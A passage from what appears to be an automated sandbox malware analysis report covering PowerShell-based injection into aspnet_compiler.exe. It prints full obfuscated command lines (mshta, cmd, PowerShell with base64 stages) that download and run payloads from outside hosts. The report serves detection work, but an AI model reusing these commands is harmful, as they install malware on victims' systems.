                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AB4A80 mov eax, dword ptr fs:[00000030h]12_2_01AB4A80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A18A90 mov edx, dword ptr fs:[00000030h]12_2_01A18A90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E8AA0 mov eax, dword ptr fs:[00000030h]12_2_019E8AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E8AA0 mov eax, dword ptr fs:[00000030h]12_2_019E8AA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E0AD0 mov eax, dword ptr fs:[00000030h]12_2_019E0AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1AAEE mov eax, dword ptr fs:[00000030h]12_2_01A1AAEE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1AAEE mov eax, dword ptr fs:[00000030h]12_2_01A1AAEE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A36ACC mov eax, dword ptr fs:[00000030h]12_2_01A36ACC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A36ACC mov eax, dword ptr fs:[00000030h]12_2_01A36ACC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A36ACC mov eax, dword ptr fs:[00000030h]12_2_01A36ACC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A14AD0 mov eax, dword ptr fs:[00000030h]12_2_01A14AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A14AD0 mov eax, dword ptr fs:[00000030h]12_2_01A14AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1CA24 mov eax, dword ptr fs:[00000030h]12_2_01A1CA24
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0EA2E mov eax, dword ptr fs:[00000030h]12_2_01A0EA2E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A04A35 mov eax, dword ptr fs:[00000030h]12_2_01A04A35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A04A35 mov eax, dword ptr fs:[00000030h]12_2_01A04A35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1CA38 mov eax, dword ptr fs:[00000030h]12_2_01A1CA38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A6CA11 mov eax, dword ptr fs:[00000030h]12_2_01A6CA11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0A5B mov eax, dword ptr fs:[00000030h]12_2_019F0A5B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019F0A5B mov eax, dword ptr fs:[00000030h]12_2_019F0A5B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A8EA60 mov eax, dword ptr fs:[00000030h]12_2_01A8EA60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1CA6F mov eax, dword ptr fs:[00000030h]12_2_01A1CA6F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1CA6F mov eax, dword ptr fs:[00000030h]12_2_01A1CA6F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1CA6F mov eax, dword ptr fs:[00000030h]12_2_01A1CA6F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E6A50 mov eax, dword ptr fs:[00000030h]12_2_019E6A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E6A50 mov eax, dword ptr fs:[00000030h]12_2_019E6A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E6A50 mov eax, dword ptr fs:[00000030h]12_2_019E6A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E6A50 mov eax, dword ptr fs:[00000030h]12_2_019E6A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E6A50 mov eax, dword ptr fs:[00000030h]12_2_019E6A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E6A50 mov eax, dword ptr fs:[00000030h]12_2_019E6A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E6A50 mov eax, dword ptr fs:[00000030h]12_2_019E6A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5CA72 mov eax, dword ptr fs:[00000030h]12_2_01A5CA72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A5CA72 mov eax, dword ptr fs:[00000030h]12_2_01A5CA72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A16DA0 mov eax, dword ptr fs:[00000030h]12_2_01A16DA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA8DAE mov eax, dword ptr fs:[00000030h]12_2_01AA8DAE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AA8DAE mov eax, dword ptr fs:[00000030h]12_2_01AA8DAE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01AB4DAD mov eax, dword ptr fs:[00000030h]12_2_01AB4DAD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1CDB1 mov ecx, dword ptr fs:[00000030h]12_2_01A1CDB1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1CDB1 mov eax, dword ptr fs:[00000030h]12_2_01A1CDB1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A1CDB1 mov eax, dword ptr fs:[00000030h]12_2_01A1CDB1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A08DBF mov eax, dword ptr fs:[00000030h]12_2_01A08DBF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A08DBF mov eax, dword ptr fs:[00000030h]12_2_01A08DBF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A00DE1 mov eax, dword ptr fs:[00000030h]12_2_01A00DE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0CDF0 mov eax, dword ptr fs:[00000030h]12_2_01A0CDF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A0CDF0 mov ecx, dword ptr fs:[00000030h]12_2_01A0CDF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A80DF0 mov eax, dword ptr fs:[00000030h]12_2_01A80DF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A80DF0 mov eax, dword ptr fs:[00000030h]12_2_01A80DF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019D6DF6 mov eax, dword ptr fs:[00000030h]12_2_019D6DF6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01A64DD7 mov eax, dword ptr fs:[00000030h]12_2_01A64DD7
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Yara detected Powershell decode and execute
                  Source: Yara matchFile source: amsi32_6592.amsi.csv, type: OTHER
                  Yara detected Powershell download and execute
                  Source: Yara matchFile source: amsi32_6592.amsi.csv, type: OTHER
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTR
                  Injects a PE file into a foreign processes
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 1060008Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6914.tmp" "c:\Users\user\AppData\Local\Temp\pdppuoci\CSCAD4A7145578C4D2F8E5E86198ABD60D6.TMP"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfoseJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jffwa0tznkugicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfezc10wxbficagicagicagicagicagicagicagicagicagicagicatbwvtqmvszgvmau5jdglvbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vbi5ktewilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagslf6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagemmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbuv2lkbwzpekcsdwludcagicagicagicagicagicagicagicagicagicagicagce1qdxrlsyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagighhswr3zngpoycgicagicagicagicagicagicagicagicagicagicagic1uyw1licagicagicagicagicagicagicagicagicagicagicaiyufptxpoiiagicagicagicagicagicagicagicagicagicagicaglu5htuvtcefdzsagicagicagicagicagicagicagicagicagicagicagsg1qtwmgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrrcgtlwtzfojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumtivmzyxl3nlzw1lymvzdhroaw5nc2vudglyzwxpzmvnaxzlbmjhy2t3axroz29vzc50suyilcikzw52okfquerbvefcc2vlbwvizxn0dghpbmdzzw50axjlbglmzwdpdmvuymfjlnziuyismcwwktttvefydc1ztevfccgzkttjasagicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxzzwvtzwjlc3r0agluz3nlbnrpcmvsawzlz2l2zw5iywmudmjtig=='+[char]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jffwa0tznkugicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfezc10wxbficagicagicagicagicagicagicagicagicagicagicatbwvtqmvszgvmau5jdglvbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vbi5ktewilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagslf6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagemmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbuv2lkbwzpekcsdwludcagicagicagicagicagicagicagicagicagicagicagce1qdxrlsyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagighhswr3zngpoycgicagicagicagicagicagicagicagicagicagicagic1uyw1licagicagicagicagicagicagicagicagicagicagicaiyufptxpoiiagicagicagicagicagicagicagicagicagicagicaglu5htuvtcefdzsagicagicagicagicagicagicagicagicagicagicagsg1qtwmgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrrcgtlwtzfojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumtivmzyxl3nlzw1lymvzdhroaw5nc2vudglyzwxpzmvnaxzlbmjhy2t3axroz29vzc50suyilcikzw52okfquerbvefcc2vlbwvizxn0dghpbmdzzw50axjlbglmzwdpdmvuymfjlnziuyismcwwktttvefydc1ztevfccgzkttjasagicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxzzwvtzwjlc3r0agluz3nlbnrpcmvsawzlz2l2zw5iywmudmjtig=='+[char]34+'))')))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $alastrar = 'jgvzdhjlbgvqyxigpsanahr0chm6ly8xmde2lmzpbgvtywlslmnvbs9hcgkvzmlszs9nzxq/zmlszwtlet1ivfvhx0v5cnveujbpqvpimehisnllcfvywfn2rl9pnmo4yndlvgvxqkn1mtl4y2jquu41vgtzytrprzbncwnjcvdotgxnjnbrx3zpzd1lmdewotyzogm5ymziotu3mtczmjc5ndm1nmexzmy2yyanoyrhbwjpz3vpzgfkzsa9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jgvudhjhzgfuagegpsakyw1iawd1awrhzguurg93bmxvywreyxrhkcrlc3ryzwxlamfyktskym9ybmvjbya9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrlbnryywrhbmhhktskbglxdwlkawzpy2fyid0gjzw8qkftrty0x1nuqvjupj4noyrwaw50b3jhid0gjzw8qkftrty0x0vord4+jzsky2hvdxzpcia9icrib3juzwnvlkluzgv4t2yojgxpcxvpzglmawnhcik7jgltbwvyz2lyid0gjgjvcm5ly28usw5kzxhpzigkcgludg9yysk7jgnob3v2axiglwdlidaglwfuzcakaw1tzxjnaxiglwd0icrjag91dmlyoyrjag91dmlyics9icrsaxf1awrpzmljyxiutgvuz3rooyrmcnv0awzpy2fyid0gjgltbwvyz2lyic0gjgnob3v2axi7jgj1c3nvbgnvid0gjgjvcm5ly28uu3vic3ryaw5nkcrjag91dmlylcakznj1dglmawnhcik7jhf1aw5py2egpsatam9pbiaojgj1c3nvbgnvllrvq2hhckfycmf5kckgfcbgb3jfywnolu9iamvjdcb7icrfih0pwy0xli4tkcridxnzb2xjby5mzw5ndggpxtskymvpcmftzsa9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojhf1aw5py2epoyrzywlkb3igpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcrizwlyyw1lktskzw5nb3jkdxjhcia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrlbmdvcmr1cmfylkludm9rzsgkbnvsbcwgqcgndhh0lkfsru5mrvqvmtyzlzixljmyms41ndiumjcxly86chr0accsicckzgfkyw5ljywgjyrkywrhbmunlcanjgrhzgfuzscsicdhc3buzxrfy29tcglszxinlcanjgrhzgfuzscsicckzgfkyw5ljywnjgrhzgfuzscsjyrkywrhbmunlcckzgfkyw5ljywnjgrhzgfuzscsjyrkywrhbmunlccxjywnjgrhzgfuzscpkts=';$morfose = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($alastrar));invoke-expression $morfose
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'jffwa0tznkugicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigfezc10wxbficagicagicagicagicagicagicagicagicagicagicatbwvtqmvszgvmau5jdglvbiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvytg1vbi5ktewilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagslf6lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagemmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbuv2lkbwzpekcsdwludcagicagicagicagicagicagicagicagicagicagicagce1qdxrlsyxjbnrqdhigicagicagicagicagicagicagicagicagicagicagighhswr3zngpoycgicagicagicagicagicagicagicagicagicagicagic1uyw1licagicagicagicagicagicagicagicagicagicagicaiyufptxpoiiagicagicagicagicagicagicagicagicagicagicaglu5htuvtcefdzsagicagicagicagicagicagicagicagicagicagicagsg1qtwmgicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicrrcgtlwtzfojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtcylji0ns4xmjmumtivmzyxl3nlzw1lymvzdhroaw5nc2vudglyzwxpzmvnaxzlbmjhy2t3axroz29vzc50suyilcikzw52okfquerbvefcc2vlbwvizxn0dghpbmdzzw50axjlbglmzwdpdmvuymfjlnziuyismcwwktttvefydc1ztevfccgzkttjasagicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxzzwvtzwjlc3r0agluz3nlbnrpcmvsawzlz2l2zw5iywmudmjtig=='+[char]34+'))')))"Jump to behavior
